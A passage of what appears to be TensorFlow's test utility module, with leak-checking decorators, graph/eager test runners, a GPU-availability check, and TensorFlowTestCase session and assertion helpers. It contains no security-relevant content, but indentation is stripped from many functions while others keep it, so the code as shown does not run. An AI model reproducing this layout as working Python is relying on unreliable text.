        # Make sure our collection checks don't show up as leaked memory by
        # removing references to temporary variables.
        del collection
        del collection_key
        del size_before
      del collection_sizes_before
      gc.collect()
      # There should be no new Python objects hanging around.
      new_count = len(gc.get_objects())
      # In some cases (specifically on MacOS), new_count is somehow
      # smaller than previous_count.
      # Using plain assert because not all classes using this decorator
      # have assertLessEqual
      assert new_count <= previous_count, (
          "new_count(%d) is not less than or equal to previous_count(%d)" % (
              new_count, previous_count))
      gc.enable()

  return decorator
def assert_no_new_tensors(f):
  """Decorator for asserting that no new Tensors persist after a test.

  Mainly useful for checking that code using the Python C API has correctly
  manipulated reference counts.

  Clears the caches that it knows about, runs the garbage collector, then checks
  that there are no Tensor or Tensor-like objects still around. This includes
  Tensors to which something still has a reference (e.g. from missing
  Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
  of the objects has __del__ defined).

  Args:
    f: The test case to run.

  Returns:
    The decorated test case.
  """

  def decorator(self, **kwargs):
    """Finds existing Tensors, runs the test, checks for new Tensors."""

    def _is_tensorflow_object(obj):
      # Wrapped in try/except because gc.get_objects() may yield weak proxies
      # whose referents are already gone; isinstance then raises.
      try:
        return isinstance(obj,
                          (ops.Tensor, variables.Variable,
                           tensor_shape.Dimension, tensor_shape.TensorShape))
      except ReferenceError:
        # If the object no longer exists, we don't care about it.
        return False

    # Record ids (not references!) of pre-existing TF objects so the check
    # below does not itself keep anything alive.
    tensors_before = set(
        id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
    if context.executing_eagerly():
      f(self, **kwargs)
      ops.reset_default_graph()
    else:
      # Run the test in a new graph so that collections get cleared when it's
      # done, but inherit the graph key so optimizers behave.
      outside_graph_key = ops.get_default_graph()._graph_key
      with ops.Graph().as_default():
        ops.get_default_graph()._graph_key = outside_graph_key
        f(self, **kwargs)
    # Make an effort to clear caches, which would otherwise look like leaked
    # Tensors.
    context.get_default_context()._clear_caches()  # pylint: disable=protected-access
    gc.collect()
    tensors_after = [
        obj for obj in gc.get_objects()
        if _is_tensorflow_object(obj) and id(obj) not in tensors_before
    ]
    if tensors_after:
      raise AssertionError(("%d Tensors not deallocated after test: %s" % (
          len(tensors_after),
          str(tensors_after),
      )))
  return decorator
def assert_no_garbage_created(f):
  """Test method decorator to assert that no garbage has been created.

  Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
  cannot be un-set (i.e. will disable garbage collection for any other unit
  tests in the same file/shard).

  Args:
    f: The function to decorate.

  Returns:
    The decorated function.
  """

  def decorator(self, **kwargs):
    """Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
    gc.disable()
    previous_debug_flags = gc.get_debug()
    # DEBUG_SAVEALL makes the collector append unreachable objects to
    # gc.garbage instead of freeing them, so they can be inspected below.
    gc.set_debug(gc.DEBUG_SAVEALL)
    gc.collect()
    previous_garbage = len(gc.garbage)
    f(self, **kwargs)
    gc.collect()
    if len(gc.garbage) > previous_garbage:
      logging.error(
          "The decorated test created work for Python's garbage collector, "
          "likely due to a reference cycle. New objects in cycle(s):")
      for i, obj in enumerate(gc.garbage[previous_garbage:]):
        # Each leaked object is reported best-effort: printing arbitrary
        # objects can itself raise.
        try:
          logging.error("Object %d of %d", i,
                        len(gc.garbage) - previous_garbage)
          def _safe_object_str(obj):
            # Avoids calling str()/repr() on the object itself, which may fail.
            return "<%s %d>" % (obj.__class__.__name__, id(obj))
          logging.error(" Object type: %s", _safe_object_str(obj))
          logging.error(" Referrer types: %s", ", ".join(
              [_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
          logging.error(" Referent types: %s", ", ".join(
              [_safe_object_str(ref) for ref in gc.get_referents(obj)]))
          logging.error(" Object attribute names: %s", dir(obj))
          logging.error(" Object __str__:")
          logging.error(obj)
          logging.error(" Object __repr__:")
          logging.error(repr(obj))
        except Exception:  # pylint: disable=broad-except
          logging.error("(Exception while printing object)")
    # This will fail if any garbage has been created, typically because of a
    # reference cycle.
    self.assertEqual(previous_garbage, len(gc.garbage))
    # TODO(allenl): Figure out why this debug flag reset doesn't work. It would
    # be nice to be able to decorate arbitrary tests in a large test suite and
    # not hold on to every object in other tests.
    gc.set_debug(previous_debug_flags)
    gc.enable()
  return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
def generate_combinations_with_testcase_name(**kwargs):
  """Generate combinations based on its keyword arguments using combine().

  This function calls combine() and appends a testcase name to the list of
  dictionaries returned. The 'testcase_name' key is a required for named
  parameterized tests.

  Args:
    **kwargs: keyword arguments of form `option=[possibilities, ...]`
      or `option=the_only_possibility`.

  Returns:
    a list of dictionaries for each combination. Keys in the dictionaries are
    the keyword argument names. Each key has one value - one of the
    corresponding keyword argument values.
  """
  named_combinations = []
  for combination in _combine_named_parameters(**kwargs):
    assert isinstance(combination, OrderedDict)
    # Build a name suffix from the alphanumeric characters of each key/value.
    suffix = "".join(
        "_{}_{}".format("".join(filter(str.isalnum, key)),
                        "".join(filter(str.isalnum, str(value))))
        for key, value in combination.items())
    entries = list(combination.items())
    entries.append(("testcase_name", "_test{}".format(suffix)))
    named_combinations.append(OrderedDict(entries))
  return named_combinations
def run_all_in_graph_and_eager_modes(cls):
  """Execute all test methods in the given class with and without eager."""
  base_decorator = run_in_graph_and_eager_modes
  # Snapshot the attribute names first: setattr() below mutates cls.__dict__.
  for name in list(cls.__dict__):
    value = cls.__dict__[name]
    if name.startswith("test") and callable(value):
      setattr(cls, name, base_decorator(value))
  return cls
def run_in_graph_and_eager_modes(func=None,
                                 config=None,
                                 use_gpu=True,
                                 reset_test=True,
                                 assert_no_eager_garbage=False):
  """Execute the decorated test with and without enabling eager execution.

  This function returns a decorator intended to be applied to test methods in
  a `tf.test.TestCase` class. Doing so will cause the contents of the test
  method to be executed twice - once normally, and once with eager execution
  enabled. This allows unittests to confirm the equivalence between eager
  and graph execution (see `tf.enable_eager_execution`).

  For example, consider the following unittest:

  ```python
  class MyTests(tf.test.TestCase):

    @run_in_graph_and_eager_modes
    def test_foo(self):
      x = tf.constant([1, 2])
      y = tf.constant([3, 4])
      z = tf.add(x, y)
      self.assertAllEqual([4, 6], self.evaluate(z))

  if __name__ == "__main__":
    tf.test.main()
  ```

  This test validates that `tf.add()` has the same behavior when computed with
  eager execution enabled as it does when constructing a TensorFlow graph and
  executing the `z` tensor in a session.

  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator the can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.
    config: An optional config_pb2.ConfigProto to use to configure the
      session when executing graphs.
    use_gpu: If True, attempt to run as many operations as possible on GPU.
    reset_test: If True, tearDown and SetUp the test case between the two
      executions of the test (once with and once without eager execution).
    assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
      collector and asserts that no extra garbage has been created when running
      the test with eager execution enabled. This will fail if there are
      reference cycles (e.g. a = []; a.append(a)). Off by default because some
      tests may create garbage for legitimate reasons (e.g. they define a class
      which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
      Python interpreters (meaning that tests which rely on objects being
      collected elsewhere in the unit test file will not work). Additionally,
      checks that nothing still has a reference to Tensors that the test
      allocated.

  Returns:
    Returns a decorator that will run the decorated test method twice:
    once by constructing and executing a graph in a session and once with
    eager execution enabled.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError(
          "`run_test_in_graph_and_eager_modes` only supports test methods. "
          "Did you mean to use `run_all_tests_in_graph_and_eager_modes`?")

    def decorated(self, **kwargs):
      # First pass: graph mode inside a test session. A SkipTest raised here
      # is swallowed so the eager pass below still runs.
      try:
        with context.graph_mode():
          with self.test_session(use_gpu=use_gpu, config=config):
            f(self, **kwargs)
      except unittest.case.SkipTest:
        pass

      def run_eagerly(self, **kwargs):
        # Explicitly pin to CPU when GPU use was not requested.
        if not use_gpu:
          with ops.device("/cpu:0"):
            f(self, **kwargs)
        else:
          f(self, **kwargs)

      if assert_no_eager_garbage:
        ops.reset_default_graph()
        # Wrap the eager run with the leak-detection decorators defined above.
        run_eagerly = assert_no_new_tensors(
            assert_no_garbage_created(run_eagerly))

      # Second pass: eager mode.
      with context.eager_mode():
        if reset_test:
          # This decorator runs the wrapped test twice.
          # Reset the test environment between runs.
          self.tearDown()
          self._tempdir = None
          self.setUp()
        run_eagerly(self, **kwargs)

    return decorated

  if func is not None:
    return decorator(func)

  return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all([x in str(e) for x in ["CUDA", "not find"]]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
  """Uses gpu when requested and available."""
  # Fall back to CPU when the GPU was not requested or is not present.
  dev = "/device:GPU:0" if use_gpu and is_gpu_available() else "/device:CPU:0"
  with ops.device(dev):
    yield
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
  def setUp(self):
    """Resets the session cache, RNG seeds and the default graph."""
    self._ClearCachedSession()
    # Seed both Python's and numpy's RNGs for reproducible tests.
    random.seed(random_seed.DEFAULT_GRAPH_SEED)
    np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
    # Note: The following line is necessary because some test methods may error
    # out from within nested graph contexts (e.g., via assertRaises and
    # assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
    # under certain versions of Python. That would cause
    # ops.reset_default_graph() to throw an exception if the stack were not
    # cleared first.
    ops._default_graph_stack.reset()  # pylint: disable=protected-access
    ops.reset_default_graph()
    random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves different than session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if context.executing_eagerly():
yield None
elif graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
  class _CheckedThread(object):
    """A wrapper class for Thread that asserts successful completion.

    This class should be created using the TensorFlowTestCase.checkedThread()
    method.
    """

    def __init__(self, testcase, target, args=None, kwargs=None):
      """Constructs a new instance of _CheckedThread.

      Args:
        testcase: The TensorFlowTestCase for which this thread is being created.
        target: A callable object representing the code to be executed in the
          thread.
        args: A tuple of positional arguments that will be passed to target.
        kwargs: A dictionary of keyword arguments that will be passed to target.
      """
      self._testcase = testcase
      self._target = target
      self._args = () if args is None else args
      self._kwargs = {} if kwargs is None else kwargs
      # The underlying thread runs _protected_run so that any exception from
      # the target is captured instead of killing the thread silently.
      self._thread = threading.Thread(target=self._protected_run)
      # Holds the exception raised by the target (if any); re-raised as a
      # test failure in join().
      self._exception = None
      # Whether join() was called; consulted by check_termination().
      self._is_thread_joined = False

    def _protected_run(self):
      """Target for the wrapper thread. Sets self._exception on failure."""
      try:
        self._target(*self._args, **self._kwargs)
      except Exception as e:  # pylint: disable=broad-except
        self._exception = e

    def start(self):
      """Starts the thread's activity.

      This must be called at most once per _CheckedThread object. It arranges
      for the object's target to be invoked in a separate thread of control.
      """
      self._thread.start()

    def join(self):
      """Blocks until the thread terminates.

      Raises:
        self._testcase.failureException: If the thread terminates with due to
          an exception.
      """
      self._is_thread_joined = True
      self._thread.join()
      if self._exception is not None:
        self._testcase.fail("Error in checkedThread: %s" % str(self._exception))

    def is_alive(self):
      """Returns whether the thread is alive.

      This method returns True just before the run() method starts
      until just after the run() method terminates.

      Returns:
        True if the thread is alive, otherwise False.
      """
      return self._thread.is_alive()

    def check_termination(self):
      """Returns whether the checked thread was properly used and did terminate.

      Every checked thread should be "join"ed after starting, and before the
      test tears down. If it is not joined, it is possible the thread will hang
      and cause flaky failures in tests.

      Raises:
        self._testcase.failureException: If check_termination was called before
          thread was joined.
        RuntimeError: If the thread is not terminated. This means thread was not
          joined with the main thread.
      """
      if self._is_thread_joined:
        if self.is_alive():
          raise RuntimeError(
              "Thread was not joined with main thread, and is still running "
              "when the test finished.")
      else:
        self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
return a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
  def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
    """Asserts two array-likes are element-wise close, printing diagnostics.

    Args:
      a: the expected value; anything `_GetNdArray` accepts.
      b: the actual value; anything `_GetNdArray` accepts.
      rtol: relative tolerance.
      atol: absolute tolerance.
      msg: Optional message to report on failure.
    """
    a = self._GetNdArray(a)
    b = self._GetNdArray(b)
    self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
                     (a.shape, b.shape))
    if not np.allclose(a, b, rtol=rtol, atol=atol):
      # Prints more details than np.testing.assert_allclose.
      #
      # NOTE: numpy.allclose (and numpy.testing.assert_allclose)
      # checks whether two arrays are element-wise equal within a
      # tolerance. The relative difference (rtol * abs(b)) and the
      # absolute difference atol are added together to compare against
      # the absolute difference between a and b. Here, we want to
      # print out which elements violate such conditions.
      cond = np.logical_or(
          np.abs(a - b) > atol + rtol * np.abs(b),
          np.isnan(a) != np.isnan(b))
      if a.ndim:
        x = a[np.where(cond)]
        y = b[np.where(cond)]
        print("not close where = ", np.where(cond))
      else:
        # np.where is broken for scalars
        x, y = a, b
      print("not close lhs = ", x)
      print("not close rhs = ", y)
      print("not close dif = ", np.abs(x - y))
      print("not close tol = ", atol + rtol * np.abs(y))
      print("dtype = %s, shape = %s" % (a.dtype, a.shape))
      # TODO(xpan): There seems to be a bug:
      # tensorflow/compiler/tests:binary_ops_test pass with float32
      # nan even though the equal_nan is False by default internally.
      # assert_allclose raises with a detailed per-element error message.
      np.testing.assert_allclose(
          a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
  def assertAllEqual(self, a, b, msg=None):
    """Asserts that two numpy arrays or Tensors have the same values.

    Args:
      a: the expected numpy ndarray or anything can be converted to one.
      b: the actual numpy ndarray or anything can be converted to one.
      msg: Optional message to report on failure.
    """
    msg = msg if msg else ""
    a = self._GetNdArray(a)
    b = self._GetNdArray(b)
    self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s."
                     " %s" % (a.shape, b.shape, msg))
    same = (a == b)
    # For floating dtypes, NaN positions are treated as equal when they match
    # in both arrays (NaN != NaN would otherwise flag them as different).
    if (a.dtype in [
        np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
    ]):
      same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
    if not np.all(same):
      # Prints more details than np.testing.assert_array_equal.
      diff = np.logical_not(same)
      if a.ndim:
        x = a[np.where(diff)]
        y = b[np.where(diff)]
        print("not equal where = ", np.where(diff))
      else:
        # np.where is broken for scalars
        x, y = a, b
      print("not equal lhs = ", x)
      print("not equal rhs = ", y)
      # assert_array_equal raises with a detailed per-element error message.
      np.testing.assert_array_equal(a, b, err_msg=msg)
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
def assertAllLess(self, a, comparison_target):
  """Assert element values are all less than a target value.

  (Docstring fix: the original said "greater", copied from
  `assertAllGreater`; the code asserts max(a) < comparison_target.)

  Args:
    a: The numpy `ndarray`, or anything that can be converted into a
      numpy `ndarray` (including Tensor).
    comparison_target: The target value of comparison.
  """
  a = self._GetNdArray(a)
  self.assertLess(np.max(a), comparison_target)
